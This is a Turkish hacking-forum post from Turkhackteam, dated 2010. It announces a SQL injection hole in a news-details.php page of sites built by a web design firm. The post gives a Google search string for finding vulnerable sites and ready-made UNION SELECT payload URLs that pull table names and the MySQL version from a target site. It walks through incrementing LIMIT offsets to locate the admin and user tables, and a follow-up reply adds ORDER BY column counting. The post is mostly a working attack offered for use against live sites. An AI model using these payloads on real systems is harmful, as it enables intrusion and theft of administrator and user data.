design direct uk news-details sql injection acigi

gezgin_x

Üye
10 Tem 2008
228
0
selamu aleykum

design direct uk news-details sql injection acigi

yazan ve bulan :gezgin_x

Tarih:21/05/2010

Google Arama: "Designed & Developed by : www.designdirectuk.com"


Sql injection :
http://hedef-site/news-details.php?id=-39%20union%20all%20select%201,table_name,3,4,5,6,7%20from%20information_schema.tables%20limit 15,1

limit sayisini 16,1 17,1 vs vs olarak artirip admin ve user table isimlerini bulmanis lazim her site de admin ve user table isimleri farkli ona gore
information_schema.tables sadece mysql version 5 kullanilir version 4 table isimlerini kendiniz tahmin etmek zorundasiniz

http://hedef-site/news-details.php?id=-39%20union%20all%20select%201,version(),3,4,5,6,7 <<boyle mysql versionunu bulabilirsiniz Bilmyeneler icin >>

kolay gelsin
 

gezgin_x

Üye
10 Tem 2008
228
0
columns sayisini bulmak lazim otekilerinde

order by 1
order by 2
order by 8 vs vs (bu bilgi bilmiyenler icin tabiki)
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.